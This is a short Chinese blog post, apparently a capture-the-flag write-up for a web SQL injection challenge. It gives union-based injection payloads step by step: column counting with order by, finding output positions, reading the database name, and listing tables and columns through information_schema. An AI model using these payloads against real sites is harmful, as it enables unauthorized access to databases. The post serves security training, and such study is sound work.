攻防世界web进阶区(2)--记一次sql注入
题目地址:http://111.198.29.45:56094
这是一道sql注入题。
试试1‘ order by 3#,发现页面显示正常,将3换为4时,页面报错,则说明含有3个字段。
接下来判断输出点,即输入1‘ union select 1,2,3#,发现2与3的位置是输出点。
爆数据库名: 1‘ union select 1,database(),3#
1‘ union select 1,2,table_name from information_schema.tables where table_schema=‘news‘#查询 news 数据库中的表
1‘ union select 1,2,column_name from information_schema.columns where table_schema=‘news‘ and table_name=‘secret_table‘#查询列名
得flag:
相关推荐
ALiDan 2020-07-27
qshpeng 2020-07-26
世樹 2020-07-17
chenjiazhu 2020-07-08
一对儿程序猿 2020-07-04
明月清风精进不止 2020-06-13
godfather 2020-06-13
ItBJLan 2020-06-11
tanrong 2020-06-11
ALiDan 2020-06-11
码墨 2020-06-09
世樹 2020-06-05
lt云飞扬gt 2020-06-03
godfather 2020-06-03
qshpeng 2020-05-11
明月清风精进不止 2020-05-07
gwn00 2020-05-07